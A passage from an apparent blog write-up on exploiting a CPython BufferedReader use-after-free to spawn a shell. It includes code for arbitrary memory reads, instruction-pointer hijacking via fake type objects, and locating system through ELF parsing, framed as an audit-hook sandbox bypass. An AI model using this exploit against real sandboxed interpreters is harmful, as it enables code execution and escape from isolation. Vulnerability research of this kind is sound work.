Once we have saved a reference to the memoryview we can delete the BufferedReader object. This will force the internal buffer to be freed, even though we still have a reference to our friendly memoryview, which is now pointing to a freed buffer.
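For contrast, it helps to see what normally stops this from happening. A bytearray counts its outstanding buffer exports and refuses to reallocate while a memoryview is alive. The sketch below shows that behaviour, and the bug described above amounts to the reader's internal buffer being freed without an equivalent safeguard. The function name is hypothetical.

```python
def resize_while_exported():
    data = bytearray(b"A" * 16)
    view = memoryview(data)           # the bytearray now has one export
    try:
        data.extend(b"B" * 4096)      # would need to reallocate the buffer
    except BufferError:
        blocked = True
    else:
        blocked = False
    view.release()                    # drop the export
    data.extend(b"B" * 4096)          # resizing is allowed again
    return blocked, len(data)
```

While the view exists the resize raises BufferError, so the view can never end up pointing at freed memory.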

Exploitation

Now we have a memoryview pointing to freed heap memory, which we can read from or write to, where do we go from here?

The easiest approach for exploitation is to create a list with length equal to the length of the freed buffer, which will very likely have its item buffer (ob_item) allocated in the same place as the freed buffer. This will mean we get two different “views” on the same piece of memory. One view, the memoryview, thinks that the memory is just an array of bytes, which we can write to or read from arbitrarily. The second view is the list we created, which thinks that the memory is a list of PyObject pointers. This means we can create fake PyObjects somewhere in memory, write their addresses into the list by writing to the memoryview, and then access them by indexing into the list.

In the case of the PoC, they write 0 to the buffer (line 16), and then access it with print(L[0]). L[0] gets the first PyObject* which is 0 and then print tries to access some fields on it, resulting in a null pointer dereference.

Given that this bug is present on every version of Python since at least Python 2.7, I wanted my exploit to work on as many versions of Python 3 as I could, just for fun. I decided against writing it for Python 2 because there are some differences in the languages which I didn’t want to account for in my exploit, but it’s absolutely possible to tweak my code to get this to work there. This meant that I couldn’t rely on any hardcoded offsets into the CPython binary, or into libc. Instead I chose to use known struct offsets (which haven’t changed between Python versions), some manual ELF parsing, and some known linker behaviour, to get a reliable exploit.

The goal of the exploit is to call system("/bin/sh"). The steps are as follows:

1. Leak CPython binary function pointer
2. Calculate the base address of CPython
3. Calculate the address of system or its PLT stub
4. Jump to this address with the first argument pointing to /bin/sh
5. Win

Getting a leak

Leaking arbitrary amounts of data from an arbitrary location turned out to be pretty easy. We can use a specially crafted bytearray object. The layout of a bytearray looks like this:

typedef struct {
    PyObject_VAR_HEAD
    Py_ssize_t ob_alloc;   /* How many bytes allocated in ob_bytes */
    char *ob_bytes;        /* Physical backing buffer */
    char *ob_start;        /* Logical start inside ob_bytes */
    Py_ssize_t ob_exports; /* How many buffer exports */
} PyByteArrayObject;

ob_bytes is a pointer to a heap-allocated buffer. When we read from or write to the bytearray, we’re reading/writing to this heap buffer. If we can craft a fake bytearray object, and we can set ob_bytes to point to an arbitrary address, then we can read or write to this arbitrary address by reading or writing to this bytearray.

Crafting fake objects is made very easy by CPython. If you create a bytes object (this is not the same thing as a bytearray), the raw data within the bytes object is always present 32 bytes after the start of the PyBytesObject, in one contiguous chunk. We can get the address of the PyBytesObject with the id function, and we know the offset to our data, so we can do something like this:

fake = b''.join([
        b'AAAAAAAA',    # refcount
        b'BBBBBBBB',    # type object pointer
        b'CCCC'         # other object data...
    ])
address_of_fake_object = id(fake) + 32

Now address_of_fake_object will be the address of AAAAAAAABBBBBBBBCCCC....
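The offset can be sanity-checked without any memory corruption by reading the bytes back through ctypes. In this sketch the offset is derived from bytes.__basicsize__ instead of hardcoding 32, on the assumption that the inline data is the last field of the object header, as it is in standard CPython builds. The helper name is hypothetical.

```python
import ctypes

# Offset of the inline data within a bytes object. __basicsize__ counts the
# header plus one byte of data, so subtract one. This is 32 on common
# 64-bit builds.
BYTES_DATA_OFFSET = bytes.__basicsize__ - 1


def address_of_payload(data: bytes) -> int:
    """Address of the first data byte of a bytes object (CPython only)."""
    return id(data) + BYTES_DATA_OFFSET


fake = b"".join([b"AAAAAAAA", b"BBBBBBBB", b"CCCC"])
readback = ctypes.string_at(address_of_payload(fake), len(fake))
```

If the offset is right, readback is identical to fake. Note that fake must stay referenced for as long as its address is in use.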

The final leak primitive is shown below. Note that self.freed_buffer is the memoryview pointing to the freed heap buffer, and self.fake_objs is the list we created whose item buffer also points to the freed heap buffer.

def _create_fake_byte_array(self, addr, size):
    byte_array_obj = flat(
        p64(10),            # refcount
        p64(id(bytearray)), # type obj
        p64(size),          # ob_size
        p64(size),          # ob_alloc
        p64(addr),          # ob_bytes
        p64(addr),          # ob_start
        p64(0x0),           # ob_exports
    )
    self.no_gc.append(byte_array_obj) # stop gc from freeing after we return
    self.freed_buffer[0] = id(byte_array_obj) + 32

def leak(self, addr, length):
    self._create_fake_byte_array(addr, length)
    return self.fake_objs[0][0:length]

Finding the base of cpython

Now that we have a leak primitive, we can use it to find the base address of the binary. For this we need a pointer into the binary. One object which hasn’t obviously changed in any version of Python 3, and which holds pointers into the CPython binary, is the PyLong_Type object. I chose to read the pointer at offset 24. On 64-bit builds this is the tp_name member, which points to the type’s name string inside the binary (tp_dealloc sits further along, at offset 48). I could just as easily have chosen another pointer in the same object, or in another object entirely.

Once we have a pointer into the binary, we can round it down to the nearest page and then walk backwards one page at a time until we find the ELF header. This works because we know that the binary will be mapped at a page-aligned address.

All of this looks like:

def find_bin_base(self):
    # Leak the pointer at offset 24 of PyLong_Type (tp_name on 64-bit
    # builds), which points into the Python binary.
    leak = self.leak(id(int), 32)
    cpython_binary_ptr = u64(leak[24:32])
    addr = (cpython_binary_ptr >> 12) << 12  # page align the address
    # Work backwards in pages until we find the start of the binary
    for i in range(10000):
        nxt = self.leak(addr, 4)
        if nxt == b'\x7fELF':
            return addr
        addr -= PAGE_SIZE
    return None
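
To experiment with the walk-back logic without a live leak primitive, here is a small simulation. The fake_read function and the addresses are made up for this illustration and stand in for self.leak; a real walk would also fault if it stepped onto an unmapped page, which this sketch does not model.

```python
PAGE_SIZE = 0x1000

def find_elf_base(read, pointer, max_pages=10000):
    """Walk back page by page from `pointer` until the ELF magic is found."""
    addr = pointer & ~(PAGE_SIZE - 1)   # round down to a page boundary
    for _ in range(max_pages):
        if read(addr, 4) == b"\x7fELF":
            return addr
        addr -= PAGE_SIZE
    return None

# Simulated address space: a five-page "image" mapped at a made-up base.
IMAGE_BASE = 0x555555554000
image = bytearray(5 * PAGE_SIZE)
image[0:4] = b"\x7fELF"

def fake_read(addr, length):
    """Hypothetical stand-in for the leak primitive."""
    offset = addr - IMAGE_BASE
    return bytes(image[offset:offset + length])

# Pretend we leaked a pointer somewhere in the fourth page of the image.
leaked_pointer = IMAGE_BASE + 3 * PAGE_SIZE + 0x1A8
base = find_elf_base(fake_read, leaked_pointer)
print(hex(base))
```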

Instruction pointer control

Recall that every PyObject has a pointer to its type object, e.g. a PyLongObject has a pointer to PyLong_Type, and a PyListObject has a pointer to PyList_Type. Every type object effectively functions as a vtable (amongst other things), which means there are lots of nice function pointers there. With this information it’s clear that if we can fake a PyObject and point it to a fake type object, and cause one of the vtable functions to be called, we can get control of the instruction pointer.

This is easy to set up with the aforementioned trick for creating fake objects, and we can trigger the tp_getattro function pointer by attempting to access a field on the fake object.

def set_rip(self, addr, obj_refcount=0x10):
    """Set rip by using a fake object and associated type object."""
    # Fake type object
    type_obj = flat(
        p64(0xac1dc0de),    # refcount
        b'X'*0x68,          # padding
        p64(addr)*100,      # vtable funcs 
    )
    self.no_gc.append(type_obj)

    # Fake PyObject
    data = flat(
        p64(obj_refcount),  # refcount
        p64(id(type_obj)),  # pointer to fake type object
    )
    self.no_gc.append(data)

    # The bytes data starts at offset 32 in the object 
    self.freed_buffer[0] = id(data) + 32

    try:
        # Now we trigger it. This calls tp_getattro on our fake type object
        self.fake_objs[0].trigger
    except:
        # Avoid messy error output when we exit our shell
        pass

I provide a way to set the refcount of the fake object because, when a function is called from the vtable, its first argument is a pointer to the object itself. If the vtable function is actually system, then the first bytes of the object will be interpreted as the command to execute. Therefore, when creating the fake object for calling system, we can set the refcount to /bin/sh\x00.
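
The refcount trick works because /bin/sh plus its NUL terminator is exactly 8 bytes, the size of the refcount field. The sketch below shows the round trip using only built-in int methods; it illustrates the byte packing only and says nothing about whether the interpreter touches the refcount before the call.

```python
command = b"/bin/sh\x00"   # 7 characters plus the NUL terminator

# Interpret the 8 bytes as a little-endian 64-bit integer. This is the value
# that would be passed as obj_refcount.
refcount_value = int.from_bytes(command, "little")

# Packing the integer back into 8 little-endian bytes (what p64 does)
# reproduces the string, so the start of the fake object reads as "/bin/sh".
in_memory = refcount_value.to_bytes(8, "little")
print(hex(refcount_value), in_memory)
```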

Locating system

All versions of Python import system from libc. So, assuming Python is dynamically linked, we know that there’ll be an entry in the PLT for system; we just need to work out the address of this entry to be able to call it. Fortunately, we can work this out by parsing the ELF structures.

The steps to do this are as follows:

Use our arbitrary leak to leak the ELF headers
Parse the program headers looking for the header of type PT_DYNAMIC. This will give us the address of the .dynamic section
Parse the .dynamic section, extracting the DT_JMPREL, DT_SYMTAB, DT_STRTAB, DT_PLTGOT and DT_INIT values, which give us the addresses of the various structures we need
Walk the relocation table, for each item get the offset into the symbol table, and use that to get the offset into the string table which gives the corresponding function name
Keep walking the relocation table until we find the entry corresponding to system.
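
The last three steps can be sketched roughly as follows. This is not the code from my exploit: it starts from an already-known .dynamic address, treats every value as an absolute address, and runs against a tiny synthetic image. The names fake_read, put, parse_dynamic and find_reloc_index are invented for this illustration. The struct sizes (16-byte Elf64_Dyn, 24-byte Elf64_Rela and Elf64_Sym) are the standard ELF64 ones.

```python
import struct

DT_NULL, DT_PLTGOT, DT_STRTAB, DT_SYMTAB, DT_INIT, DT_JMPREL = 0, 3, 5, 6, 12, 23
WANTED = {DT_PLTGOT: "pltgot", DT_STRTAB: "strtab", DT_SYMTAB: "symtab",
          DT_INIT: "init", DT_JMPREL: "jmprel"}

def parse_dynamic(read, dyn_addr, max_entries=256):
    """Collect the wanted values from an array of Elf64_Dyn entries."""
    found = {}
    for i in range(max_entries):
        tag, value = struct.unpack("<qQ", read(dyn_addr + 16 * i, 16))
        if tag == DT_NULL:
            break
        if tag in WANTED:
            found[WANTED[tag]] = value
    return found

def read_cstring(read, addr, limit=256):
    """Read a NUL-terminated string one byte at a time."""
    out = bytearray()
    for i in range(limit):
        byte = read(addr + i, 1)
        if byte in (b"", b"\x00"):
            break
        out += byte
    return bytes(out)

def find_reloc_index(read, dyn, name, max_relocs=4096):
    """Return the index of the Elf64_Rela entry whose symbol is `name`.

    A real walk should stop after DT_PLTRELSZ bytes; this sketch just caps
    the number of entries.
    """
    for idx in range(max_relocs):
        _, r_info, _ = struct.unpack("<QQq", read(dyn["jmprel"] + 24 * idx, 24))
        sym_idx = r_info >> 32   # upper 32 bits of r_info hold the symbol index
        (st_name,) = struct.unpack("<I", read(dyn["symtab"] + 24 * sym_idx, 4))
        if read_cstring(read, dyn["strtab"] + st_name) == name:
            return idx
    return None

# Tiny synthetic image so the sketch runs without a real target.
BASE = 0x10000
mem = bytearray(0x400)

def fake_read(addr, length):
    """Hypothetical stand-in for the leak primitive."""
    return bytes(mem[addr - BASE:addr - BASE + length])

def put(offset, data):
    mem[offset:offset + len(data)] = data

put(0x100, b"\x00puts\x00system\x00")                   # string table
put(0x218, struct.pack("<IBBHQQ", 1, 0, 0, 0, 0, 0))    # symbol 1 -> "puts"
put(0x230, struct.pack("<IBBHQQ", 6, 0, 0, 0, 0, 0))    # symbol 2 -> "system"
put(0x300, struct.pack("<QQq", 0, (1 << 32) | 7, 0))    # reloc 0 -> symbol 1
put(0x318, struct.pack("<QQq", 0, (2 << 32) | 7, 0))    # reloc 1 -> symbol 2
entries = [(DT_STRTAB, BASE + 0x100), (DT_SYMTAB, BASE + 0x200),
           (DT_JMPREL, BASE + 0x300), (DT_NULL, 0)]
put(0x000, b"".join(struct.pack("<qQ", t, v) for t, v in entries))

dyn = parse_dynamic(fake_read, BASE)
system_idx = find_reloc_index(fake_read, dyn, b"system")
print(dyn, system_idx)
```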

The key piece of information that we want to know from this is the index in the relocation table of the system symbol. The linker is kind enough to place GOT and PLT entries in the same order as they exist in the relocation table, which means that once we have the index of the system entry we can work out its address in the GOT and the address of its PLT stub.

Full RELRO

If the binary is full RELRO then we know that all of the function addresses have already been resolved. This means that we can just read the system address from the GOT using our arbitrary leak.

system_addr = got_address + system_idx*8

got_address conveniently comes from the DT_PLTGOT entry in the .dynamic section, and system_idx is what we just worked out by walking the relocation table.

We can determine whether the binary is full RELRO by reading the 2nd and 3rd entries in the GOT, which would normally hold the address of the link_map and of _dl_runtime_resolve, respectively. If both are 0 then we can assume the binary is full RELRO, because the loader doesn’t waste its time setting up the resolution pointers if nothing needs resolving at runtime.
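
A minimal sketch of that heuristic, assuming 8-byte GOT entries and a read(addr, length) callable standing in for the leak primitive. The helper names and all of the addresses below are made up for the example.

```python
import struct

def looks_full_relro(read, got_address):
    """Heuristic from the text: the 2nd and 3rd GOT entries are both zero."""
    second, third = struct.unpack("<QQ", read(got_address + 8, 16))
    return second == 0 and third == 0

def make_reader(got_bytes, got_address):
    """Hypothetical stand-in for the leak primitive, backed by a bytes object."""
    def read(addr, length):
        offset = addr - got_address
        return got_bytes[offset:offset + length]
    return read

GOT = 0x403FF8  # made-up GOT address

# Lazy binding: the loader filled in the 2nd and 3rd entries.
lazy_got = struct.pack("<QQQ", 0x403E10, 0x7FFFF7FFE2E0, 0x7FFFF7FD8D30)
# Full RELRO: both entries are left as zero.
full_got = struct.pack("<QQQ", 0x403E10, 0, 0)

lazy = looks_full_relro(make_reader(lazy_got, GOT), GOT)
full = looks_full_relro(make_reader(full_got, GOT), GOT)
print(lazy, full)
```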

Partial / No RELRO

If the binary is partial or no RELRO then the address of system needs to be resolved at runtime. For us this just means we will jump to the relevant PLT stub which will do the resolution and then call the function, instead of reading the function address from the GOT and calling it ourselves.

We can work out the address of the PLT stub like this:

system_plt = plt_address + system_idx*SIZEOF_PLT_STUB

SIZEOF_PLT_STUB is always 16 bytes, which means the only remaining unknown in this equation is the PLT address. As far as I could tell, no structure in an ELF stores this address, so we have to use some trickery to find it. Fortunately, all of the linkers I encountered place the PLT directly after the .init section, the address of which we know from the DT_INIT entry in the .dynamic section. We also know that on x86-64 the first instruction in the PLT is always of the form push qword ptr [rip + offset], which begins with the bytes ff 35. So we can search past the end of the .init section for the ff 35 bytes, and wherever we find them is presumably the start of the PLT.

init_data = self.leak(init, 64)
plt_offset = None
for i in range(0, len(init_data), 2):
    if init_data[i:i+2] == b'\xff\x35':  # push [rip+offset]
        plt_offset = i
        break

If you want to follow along with the specifics of the parsing then I suggest reading the ELF man page and Wikipedia article, which have more information on the structures involved.

Finished Product

Putting all of these pieces together gives us a 100% reliable exploit which works in every version of Python 3 on x86-64 Ubuntu, even with PIE, full RELRO, and CET enabled, and it requires no imports. Trying it out on Ubuntu 22.04 gives:

You can find the full source of the exploit on my GitHub - https://github.com/kn32/python-buffered-reader-exploit/blob/master/exploit.py.

So what?

What’s the point of this whole thing, can’t you just do os.system(...)? Well, yes.

Given that you need to be able to execute arbitrary Python code in the first place, this exploit won’t be useful in most settings. However, it may be useful against Python interpreters which attempt to sandbox your code by restricting imports or using audit hooks, for example. This exploit doesn’t use any imports and doesn’t create any code objects, which would fire import and code.__new__ audit events, respectively. It only triggers the builtins.id audit event, which is much more likely to be permitted.
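
To see what an audit hook would observe, here is a small sketch for Python 3.8 or later. It registers a hook that records only the events mentioned above, then calls id() and performs an import. The hook and variable names are just for illustration, and colorsys is an arbitrary standard library module chosen because it is unlikely to be loaded already.

```python
import sys

seen = []

def hook(event, args):
    # The hook is called for every audit event; keep only the relevant ones.
    if event in ("builtins.id", "import", "code.__new__"):
        seen.append(event)

sys.addaudithook(hook)   # note: audit hooks cannot be removed once added

id(object())             # raises the "builtins.id" audit event
after_id = list(seen)

import colorsys          # a fresh import raises an "import" event
print(after_id, "import" in seen)
```

A sandbox that blocks on import or code.__new__ would stop the second half of this script but not the first, which is the gap the exploit relies on.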